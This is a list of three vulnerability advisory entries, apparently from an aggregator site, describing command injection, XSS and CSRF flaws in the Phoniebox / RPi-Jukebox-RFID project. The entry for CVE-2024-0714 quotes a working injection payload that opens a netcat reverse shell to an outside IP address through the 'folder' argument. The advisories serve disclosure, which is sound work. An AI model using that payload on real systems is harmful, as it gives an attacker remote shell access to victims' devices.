CVSS: 8.8EPSS: 0%CPEs: 1EXPL: 0CVE-2024-3799 – Shell command injection in Phoniebox
https://notcve.org/view.php?id=CVE-2024-3799
10 Jul 2024 — Insecure handling of POST header parameter body included in requests being sent to an instance of the open-source project Phoniebox allows an attacker to create a website, which – when visited by a user – will send malicious requests to multiple hosts on the local network. If such a request reaches the server, it will cause a shell command execution. This issue affects Phoniebox in all releases through 2.7. Newer 2.x releases were not tested, but they might also be vulnerable. Phoniebox in version 3.0 and h... • https://cert.pl/en/posts/2024/07/CVE-2024-3798 • CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') •
CVSS: 9.6EPSS: 0%CPEs: 1EXPL: 0CVE-2024-3798 – Insecure handling of GET argument in Phoniebox
https://notcve.org/view.php?id=CVE-2024-3798
10 Jul 2024 — Insecure handling of GET header parameter file included in requests being sent to an instance of the open-source project Phoniebox allows an attacker to create a website, which – when visited by a user – will send malicious requests to multiple hosts on the local network. If such a request reaches the server, it will cause one of the following (depending on the chosen payload): shell command execution, reflected XSS or cross-site request forgery. This issue affects Phoniebox in all releases through 2.7. New... • https://cert.pl/en/posts/2024/07/CVE-2024-3798 • CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') CWE-352: Cross-Site Request Forgery (CSRF) •
CVSS: 9.8EPSS: 0%CPEs: 1EXPL: 0CVE-2024-0714 – MiczFlor RPi-Jukebox-RFID HTTP Request userScripts.php os command injection
https://notcve.org/view.php?id=CVE-2024-0714
19 Jan 2024 — A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc 104.236.1.147 4444 -e /bin/bash; leads to os command injection. The attack may be launched remotely. • https://vuldb.com/?ctiid.251540 • CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') •